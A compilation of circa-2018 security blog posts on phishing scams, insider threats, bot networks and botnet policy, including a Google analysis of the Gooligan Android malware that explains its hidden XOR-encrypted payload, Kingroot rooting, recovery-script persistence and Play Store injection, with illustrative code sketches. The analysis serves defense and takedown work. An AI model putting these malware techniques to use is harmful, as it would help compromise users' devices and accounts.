  1. Use a “framework” that will guide your action. Our favorite one is the NIST Cybersecurity Framework, but there are many. This framework will help guide your policies, procedures, contracting and incident response.
  2. Work to know the threat. Knowing the cyber threat will help you more rapidly and economically adjust your defenses. We wrote a book to help you do this. Find it at: The Cyber Threat
  3. Think through your nightmare scenarios. Only you know your business, and only you can really know what could go wrong if the worst happens. Use these nightmare scenarios to determine what your most important data is; this will help prioritize your defensive actions.
  4. Ensure you and your team are patching operating systems and applications. This sounds basic, and it is. But it is too frequently overlooked, and it gets companies hacked again and again. So don't just assume it is happening. Check it.
  5. Put multi-factor authentication in place for every employee. Depending on your business model, you may need to do this for customers and suppliers too. This is very important for a good defense.
  6. Block malicious code. This is easier said than done, but work to put a strategy in place that ensures only approved applications can be installed in your enterprise, and, even though anti-virus solutions are not comprehensive, ensure you have them in place and keep them up to date.
  7. Design to detect and respond to breach. This means put monitoring in place and also use proper segmentation of your systems so an adversary has a harder time moving around.
  8. Encrypt your data. And back it up!
  9. Prepare for the worst. Know your incident response plan, and make sure it is well documented and reviewed. Ensure it includes notification procedures.

Those are just the first few steps. But please put them in place!  By following community best practices you can make an immediate difference in your own security posture. These are, for the most part, things you can do yourself for very little cost.

To accelerate your implementation of these best practices, or to independently verify and validate your security posture and receive detailed action plans for improvement, contact Crucial Point here and ask about our CISO-as-a-Service offering.

The post These Best Practices Will Stop 90% Of The Cyber Threat appeared first on The Cyber Threat.

Tax Phishing Scams Are Back: Here Are 3 to Watch Out For

This Year’s Crop of Tax Phishing Scams Targets Individuals, Employers, and Tax Preparers

Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams targeting employers, individuals, and even tax preparers that are currently making the rounds.


Employers: W-2 Phishing Emails

The W-2 phishing scams that have plagued employers for a couple of years are back with a vengeance. The IRS noticed a significant uptick in these tax phishing scams beginning in January and recently issued an official warning. Also known as spear phishing or business email compromise (BEC) scams, these campaigns differ from traditional phishing scams in that they are highly targeted. They are sent to specific employees within organizations who have access to employee tax data, usually human resources personnel, and often appear to come from a company executive. Occasionally, the IRS reports, the email will request a wire transfer along with employee W-2 data.

Individuals: Phony “Tax Notification” Emails

While the hackers behind this particular scam are not seeking tax ID data, they are harnessing the stress of tax season and victims’ fear of the IRS to get them to click on phishing links. The targets are Microsoft 365 users, and Dark Reading reports that “tens of millions” may have received the emails. The messages purport to be from the IRS, warn recipients that there is some sort of problem with their taxes and that dire consequences will result if they do not take immediate action, and include attachments with names such as “taxletter.doc.” Downloading and opening the attachment installs password-stealing malware on the victim’s machine.

Tax Preparers and Individuals: New Tax ID Theft Phishing Scheme

These highly sophisticated tax phishing scams are executed in two phases. In the first phase, hackers send traditional or spear phishing emails to tax preparers, which install malware on their computers and allow the hackers to steal client tax and bank account data.

In the second phase, the hackers use the data to file fraudulent tax returns – then have IRS refunds deposited in the victims’ bank accounts. In some cases, the return is filed using one victim’s tax data and the money deposited in another victim’s bank account. The bank account owners are then contacted by someone claiming to be an IRS representative, demanding that they take specific (and irreversible) steps to “return” the money.

Fighting Back Against Tax Phishing Scams

There are several ways to prevent falling victim to these and other tax phishing scams. Organizations should ensure that all employees are trained to identify phishing emails, including spear phishing, have a specific and clear procedure to report suspicious emails, and take all other appropriate proactive cyber security measures. Individuals should also be aware of the warning signs of a phishing email, including text written in broken English and return addresses that appear to be off, such as a government agency with a .com address.
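As a toy illustration of that last warning sign, a hypothetical heuristic might flag senders that claim to be a government agency but use a non-.gov domain. The keyword list and function are invented for illustration, not part of any real mail filter:

```python
import re

# Hypothetical heuristic: a sender naming a government agency (e.g. the IRS)
# should be using a .gov domain, not a .com one.
GOV_KEYWORDS = ("irs", "treasury", "gov")

def looks_suspicious(sender_address: str) -> bool:
    """Flag addresses that reference a government agency but lack a .gov TLD."""
    match = re.match(r"[^@]+@([\w.-]+)$", sender_address.strip().lower())
    if not match:
        return True  # a malformed address is itself a red flag
    domain = match.group(1)
    claims_gov = any(keyword in domain for keyword in GOV_KEYWORDS)
    return claims_gov and not domain.endswith(".gov")

# "irs-refunds.com" claims to be the IRS but is a .com -- suspicious.
print(looks_suspicious("notice@irs-refunds.com"))  # True
print(looks_suspicious("notice@irs.gov"))          # False
```

A real mail gateway would combine many such signals (SPF/DKIM results, display-name mismatches, attachment types) rather than rely on one string check.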

The IRS requests that suspected tax-related phishing emails be forwarded to its phishing reporting mailbox. If you receive an erroneous refund deposit to your bank account, follow the IRS’s instructions for returning it:

  1. Contact the Automated Clearing House (ACH) department of the bank/financial institution where the direct deposit was received and have them return the refund to the IRS.
  2. Call the IRS toll-free at 800-829-1040 (individual) or 800-829-4933 (business) to explain why the direct deposit is being returned.
  3. Interest may accrue on the erroneous refund.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.


Employees Are Biggest Threat to Healthcare Data Security

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.


Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:

  • 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
  • About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
  • Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
  • Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
  • 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
  • In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.

Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”

Combating Insider Threats to Healthcare Data Security

Healthcare data security is especially tricky because numerous care providers require immediate and unrestricted access to patient information to do their jobs. Any hiccups along the way could result in a dead or maimed patient. However, there are proactive steps healthcare organizations can take to combat insider threats:

  • Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
  • Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
  • Restrict system access as appropriate, and review user access levels on a regular basis.
  • Don’t forget to address the physical security of hardware, such as laptops.
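As a toy illustration of the monitoring bullet above, an audit pass might flag record accesses that have no corresponding treatment relationship. The data structures here are invented stand-ins for a real EHR audit trail, not any specific product:

```python
from collections import defaultdict

# Hypothetical care assignments: which patients each user legitimately treats.
assignments = {
    "nurse_a": {"patient_1", "patient_2"},
    "clerk_b": {"patient_3"},
}

# Hypothetical access log of (user, patient record opened) events.
access_log = [
    ("nurse_a", "patient_1"),
    ("clerk_b", "patient_3"),
    ("clerk_b", "patient_9"),  # no treatment relationship -> should be flagged
]

def unauthorized_accesses(log, assigned):
    """Return, per user, the patient records opened without an assignment."""
    flagged = defaultdict(list)
    for user, patient in log:
        if patient not in assigned.get(user, set()):
            flagged[user].append(patient)
    return dict(flagged)

print(unauthorized_accesses(access_log, assignments))
# {'clerk_b': ['patient_9']}
```

Real deployments layer anomaly detection (unusual volume, off-hours access, celebrity-record lookups) on top of this kind of baseline relationship check.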

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Taking down Gooligan: part 2 — inner workings

This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.

This is the second post of a series dedicated to the hunt and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemes and its takedown. As this post builds on the previous one, I encourage you to read it if you haven’t done so already.

This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:

You can also get the slides here but they are pretty bare.


Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:

Gooligan infection process

As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push. The Gooligan authors’ main addition is the code needed to instrument the Play Store app using a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had analyzed the full kill chain, we were able to write accurate detection signatures.

Payload decoding

Most Gooligan samples hide their malicious payload in a fake image located in assets/close.png. This file is encrypted with a hardcoded XOR encryption function. The encryption is used to evade the signatures that detect the code Gooligan borrows from previous malware. Encrypting malicious payloads is a very old malware trick, used by Android malware since at least 2011.
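As a rough illustration, a hardcoded XOR decoding loop can be sketched as follows. The key bytes here are made-up placeholders, not Gooligan’s actual key:

```python
from itertools import cycle

# Placeholder key -- the real hardcoded key is not reproduced here.
KEY = b"\x5a\x13"

def xor_decode(data: bytes, key: bytes = KEY) -> bytes:
    """XOR each payload byte against the repeating key.

    XOR is its own inverse, so the same function both encodes and decodes.
    """
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

encoded = xor_decode(b"hidden payload")          # "encrypt" the payload
assert xor_decode(encoded) == b"hidden payload"  # decoding round-trips
```

Because the transformation is a fixed, keyed byte-for-byte mapping, it defeats naive byte-pattern signatures while costing the malware almost nothing at runtime.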

Gooligan initial payload file structure

Besides its encryption function, one of the most prominent Gooligan quirks is its weird (and poor) integrity verification algorithm. Basically, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this scheme is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five.
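Under that description, the check can be sketched like this. This is a hypothetical reconstruction from the prose above, not Gooligan’s actual code:

```python
def passes_gooligan_check(data: bytes) -> bool:
    """Reconstruction of the odd integrity check described above.

    val 1 (bytes 0-4) is compared against the last five bytes, while
    val 2 (bytes 5-9) is compared against the first five -- so a file
    passes only if all three five-byte runs are identical.
    """
    val1, val2 = data[0:5], data[5:10]
    return val1 == data[-5:] and val2 == data[0:5]

# Any file whose first, second, and last five-byte runs match will pass,
# regardless of what sits in between -- a very weak integrity guarantee.
blob = b"AAAAA" + b"AAAAA" + b"arbitrary middle bytes" + b"AAAAA"
assert passes_gooligan_check(blob)
assert not passes_gooligan_check(b"AAAAABBBBBmiddleAAAAA")
```

The sketch makes the weakness obvious: the check constrains only fifteen bytes of the file, so any corruption or tampering of the middle goes undetected.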

Phone rooting


As alluded to earlier, Gooligan, like Snappea and Ghost Push, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages: First, the malware gathers information about the phone, which is sent to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored for the device. Finally, upon receiving the payload, the malware runs it to gain root access.
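The three stages can be sketched as follows. The exploit table, field names, and version logic are illustrative assumptions for the sake of the sketch, not Kingroot’s real protocol:

```python
# Illustrative exploit table: real servers match on far more fingerprint
# detail (build number, kernel version, security patch level).
EXPLOIT_DB = {
    "3": "exploit_for_android_3x.bin",
    "4": "exploit_for_android_4x.bin",
}

def gather_device_info():
    # Stage 1: the malware fingerprints the phone.
    return {"android_version": "4.4.2", "model": "example-device"}

def build_payload(info):
    # Stage 2: the server selects an exploit matching the device, if any.
    major = info["android_version"].split(".")[0]
    return EXPLOIT_DB.get(major)  # None for Android 5+ -> not exploitable

def root_device(payload):
    # Stage 3: the malware runs the returned payload to gain root.
    return payload is not None

info = gather_device_info()
assert root_device(build_payload(info))  # Android 4.x device gets rooted
assert build_payload({"android_version": "8.1"}) is None
```

Keeping the exploit selection server-side is the key design choice: it lets the operators update or add exploits without shipping new malware to infected devices.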

The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don’t want to invest in it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. This pattern is common across every platform: recently, the leaked NSA exploit EternalBlue was weaponized by the fake ransomware NotPetya. If you are interested in ransomware actors, check my posts on the subject.

Persistence setup

Upon rooting the device, Gooligan patches the recovery script to ensure that it will survive a factory reset. This resilience mechanism was the most problematic aspect of Gooligan from a remediation perspective, because for the oldest devices it left us with only an OTA (over-the-air) update or device re-flashing as ways to remove it. This was due to the fact that very old devices lack verified boot, which was introduced in Android 4.4.

Android recovery

This difficult context, combined with the urgent need to help our users, led us to resort to a strategy we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from NorCERT worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).

Play store app manipulation

The final step of the infection is the injection of a shared library into the Play Store app. This shared library allows Gooligan to manipulate the Play Store app to download apps and inject reviews.

We traced the injection code back to publicly shared code. The library itself is very bare: the authors added only the code needed to call Play Store functions. All the fraud logic lives in the main app, probably because the authors are more familiar with Java than C.

Impacted devices


Geo distribution of devices impacted by Gooligan

Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.


Phone maker distribution for devices impacted by Gooligan

In terms of devices, as shown in the bar chart above, infections are spread across all the big brands, with Samsung and Micromax unsurprisingly the most affected given their market share. Micromax, the leading Indian phone maker, is not well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and sells in quite a few countries besides India, most notably Russia.


Initial clue

Gooligan HAproxy configuration

Buried deep inside Gooligan’s patient-zero code, Check Point researchers Andrey Polkovnichenko, Yoav Flint Rosenfeld, and Feixiang He, who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load-balancer configuration, which in turn led to the full configuration file of Gooligan’s backend services.

#Ads API
        acl is_ads path_beg /overseaads/
        use_backend overseaads if is_ads

#Payment API
        acl is_paystatis path_beg /overseapay/admin/
        use_backend overseapaystatis if is_paystatis

# Play install
        acl is_appstore path_beg /appstore/
        use_backend overseapaystatis if is_appstore

Analyzing the exposed HAProxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had APIs for click fraud, receiving payment from clients, and Play Store abuse. While not visible above, there was also a complex admin- and statistics-related API.


Gooligan infrastructure

Combining the API endpoints and IPs exposed in the HAProxy configuration with our knowledge of the Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split across two main data centers: one in China and one overseas in the US, using Amazon AWS IPs. After the takedown, all the infrastructure moved back to China.

Note: in the above diagram, the Fraud endpoint appears twice. This is not a mistake: at Gooligan’s peak, its authors split it out to sustain the load and better distribute the requests.


So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it mostly runs various fraudulent schemes. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful whom you buy ads or installs from. If it is too good to be true...

In the final post of the series, I discuss Gooligan’s various monetization schemes and its takedown. See you there!

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading

On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”

Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.

In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.


Other trending cybercrime events from the week include:

  • Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
  • State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
  • Other data breaches: A misconfiguration at Florida Virtual School led to the compromise of personal information belonging to 368,000 students as well as thousands of former and current Leon County Schools employees. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments. The Nampa School District said that an email account compromise may have exposed the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
  • Arrests and legal actions: A Maryland man was sentenced to 12 years in prison for his role in a multi-million dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees are impacted by the discovery that three employee email accounts in finance, payroll, and operations had been auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
  • Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

Two of the largest data breaches of recent memory were back in the news this week due to Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach, as well as a former Equifax employee being charged with insider trading related to its massive breach.

Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.

“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.

While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.

Last week the SEC filed a complaint alleging that Jun Ying, who was next in line to be the company’s global CIO, used confidential information entrusted to him by the company to conclude that Equifax had suffered a serious breach, then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.

“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.

Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.

Google’s new Gaming Venture: A New Player?

Google in Gaming – Facts and Speculation In January 2018, game industry veteran Phil Harrison announced that he was joining Google as a Vice President and GM. With Harrison’s long history of involvement with video game companies – having previously worked with Sony and Microsoft’s Xbox division – this immediately prompted speculation and rumours about […]

Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:


It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.
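The crawl loop can be sketched roughly as below. Here, get_related_accounts and has_similar_traits are hypothetical stand-ins for the Twitter API lookups and profile heuristics, faked with a toy graph; a real crawler would also throttle itself against the API rate limits:

```python
from collections import deque

# Toy follow graph standing in for Twitter friends/followers lookups.
FAKE_GRAPH = {
    "seed1": ["bot2", "normal1"],
    "bot2": ["bot3", "seed1"],
    "bot3": ["bot2"],
    "normal1": [],
}

def get_related_accounts(user):
    """Stand-in for friends/followers API calls."""
    return FAKE_GRAPH.get(user, [])

def has_similar_traits(user):
    """Stand-in for the profile heuristics (avatar, description phrases)."""
    return user.startswith(("seed", "bot"))

def crawl(seeds):
    """Breadth-first discovery of accounts sharing the bot traits."""
    discovered, queue = set(seeds), deque(seeds)
    while queue:
        user = queue.popleft()
        for other in get_related_accounts(user):
            if other not in discovered and has_similar_traits(other):
                discovered.add(other)
                queue.append(other)
        # A real crawler would sleep here to respect API rate limits.
    return discovered

assert crawl(["seed1"]) == {"seed1", "bot2", "bot3"}
```

Accounts failing the trait check (like "normal1" above) act as the frontier boundary, which is what keeps the crawl confined to the bot network rather than wandering across all of Twitter.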

My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.
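One way to surface such clusters from the recorded relationships is to compute connected components over the follow/friend edges. Here is a minimal union-find sketch over illustrative edges (not the actual dataset):

```python
def find(parent, x):
    """Find the root of x with path halving."""
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x

def components(edges):
    """Group nodes of an undirected edge list into connected components."""
    parent = {}
    for a, b in edges:
        parent.setdefault(a, a)
        parent.setdefault(b, b)
        root_a, root_b = find(parent, a), find(parent, b)
        if root_a != root_b:
            parent[root_a] = root_b  # union the two clusters
    clusters = {}
    for node in parent:
        clusters.setdefault(find(parent, node), set()).add(node)
    return list(clusters.values())

# Two disjoint "flower" clusters: a hub account followed by its spokes.
edges = [("hub1", "s1"), ("hub1", "s2"), ("hub2", "s3"), ("hub2", "s4")]
assert sorted(map(len, components(edges))) == [3, 3]
```

In an organic social graph the components bleed into each other through mutual friends; many small, fully separate components is the structural signature of accounts created in batches.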

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.


Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group has fewer new accounts than old ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason there are fewer new accounts in this network is that Twitter’s automation seems able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets. 🙂

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.

The US Government Vs Botnets

U.S. government agencies are working hard to solve the problem of botnets and other cyber threats, and are asking for input from various stakeholders. In July 2017, the National Institute of Standards and Technology (NIST) conducted a workshop on “Enhancing Resilience of the Internet and Communications Ecosystem.” The proceedings of that workshop were published as NISTIR 8192, “Enhancing Resilience of the Internet and Communications Ecosystem: A NIST Workshop Proceedings.” Then, in early January, the U.S. Secretary of Commerce and Secretary of Homeland Security submitted “A Report to the President on Enhancing the Resilience of the Internet and Communications Ecosystem Against Botnets and Other Automated, Distributed Threats.”

To follow up on that report, which was open to public comments for 30 days, NIST conducted a second workshop, “Enhancing Resilience of the Internet & Communications.” The workshop was held February 28–March 1 at NIST’s National Cybersecurity Center of Excellence (NCCoE) in Rockville, Maryland.

The workshop discussed substantive public comments, including open issues, on the draft report about actions to address automated and distributed threats to the digital ecosystem as part of the activity directed by Executive Order 13800, “Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure.” According to the NIST website, “The Departments of Commerce and Homeland Security seek to engage all interested stakeholders—including private industry, academia, civil society, and other security experts—on the draft report, its characterization of the threat landscape, the goals laid out, and the actions to further these goals.” A final report from the departments of Homeland Security and Commerce, incorporating comments and other feedback received, is due to President Trump on May 11, 2018.

These workshops and reports are important steps in the right direction. It seems quite clear to various stakeholders across industry and government sectors that industry-government collaboration is essential to thwart cyber security threats. For starters, government can walk the talk by implementing best security practices and technologies in its operations, whether at federal or state levels. In addition, government can influence the marketplace via regulations and policies that are designed to make the Internet safer. For example, government may mandate that manufacturers build in tighter security for IoT devices, to make it harder for hackers to recruit those devices into botnets. Another possibility is that the government may impose regulations on Internet service providers, requiring them to provide protection from DDoS attacks, for example.

The Departments of Commerce and Homeland Security’s response to the President’s Executive Order calls for businesses to improve their resilience to DDoS attacks. Corero released the “Government Response to Rise in IoT DDoS Botnet Threats” Solution Brief to detail how our solutions help our customers defend themselves against all DDoS attacks and to answer business and consumer requests for better protection from cyber threats. In general, businesses and consumers have influenced the marketplace by asking for (or in some ways, demanding) better protection from cyber threats. Competition inspires vendors to offer better solutions, and enterprises to adopt those solutions. For the sake of risk management, many companies have already taken steps to increase cyber security, and many telecommunications companies have responded to the market demand by offering DDoS protection as a service to their customers. On the other hand, some enterprises don’t understand the risks of DDoS attacks or take steps to mitigate them, and the government can’t regulate or police all enterprises. If a major website gets attacked (perhaps a bank or a hospital) and the attack impacts thousands of civilians, then both the civilians and the enterprise are victimized. A case in point was the massive DDoS attack against Dyn, which impacted millions of end-users.

It’s crucial that the U.S. government take steps to advance cyber security. It can’t do it alone, however. When safeguarding the Internet for all users, a multi-stakeholder approach is essential. Though the government can help reduce IoT botnets, it cannot completely eliminate them, partly because the U.S. government can’t completely control what manufacturers do and what end-users do, especially in other countries. No one can assume that vendors around the world will bake in better security for IoT devices, or change their default passwords or update devices with security patches. No matter how heavily IoT devices are regulated or how many consumers are educated, millions of such devices around the world will still be unsecured and vulnerable to being recruited into a botnet.

Read Corero’s Government Response to Rise in IoT DDoS Botnet Threats Solution Brief to learn how our DDoS Defense solutions solve the problem of botnet-driven DDoS attacks. We have been a leader in DDoS protection solutions for over a decade; contact us to learn more about how we can help protect your network from all DDoS attacks.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

